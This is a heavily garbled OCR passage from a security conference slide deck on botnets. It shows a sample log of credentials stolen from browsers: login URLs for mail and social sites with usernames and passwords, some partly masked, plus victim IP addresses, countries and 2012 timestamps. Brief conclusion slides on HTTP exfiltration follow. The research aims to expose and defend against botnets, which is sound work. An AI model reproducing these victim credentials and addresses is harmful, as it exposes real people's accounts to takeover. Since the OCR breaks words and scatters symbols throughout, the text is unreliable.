http : / / platfbnna . pols 1 - pigggu s ern arae : a s iiia 19 S 9@@jp* pa s sword : liz a kl7

Opera

http : //poczt a .o2. pl/@krycha326<iBo2. pi : liszka

https : //www.f acebook. com/login . n™fijjSjj|Ma326@5^^^^^Pszkaliszka
h 1 1 p : / / poc zt a - j mwwi^^^^^^H . pi : rze s z ow2010

h 1 1 p : / / o2 . pl/@p^^^^^HW3 - 90 : e n t e r 12 3

++ IP Address: 187.12.65.226 | From: BR | ID: 3644C4ADE373E61EDB6B0D46F3250F397DAFFES6 | Date: 16.05. 2012 09:50:03 ++

Internet Explorer ^^^^^^^

http : //www. uol. con. br/@@@f e!( |i :

h ttp : / /www . uol . | |Lic i a no 3m :

++ IP Address: 93. S4. 42. 19 | From: BY | ID: &E7E3A7F2S19SD320374t23B4DD491FE3DC5D515 | Date: 16.05.2012 09:50:52 ++
Google Chrome

http : / / vk . com/@g@mon opolia 2 : Re a

http : / / passport .yandex. ru/@@@lady. lotisch :^^^^^^W^Wi

windows HAS

r :cg?n k PJ^^^^ 2 L,ei.b. All Browsers !

P a s wo - d : ^fl^PPS^^^'

Phone : byf lay

Login: ^ e 1 1 e 1 . b y UEP
Password :|

47

Conclusion

Botnets have become more robust and sophisticated
Significant increase in exploitation of browsers
HTTP has been used for data exfiltration
Botnets die hard

Questions

■J

Thanks

DEF Con crew

SecNiche Security Labs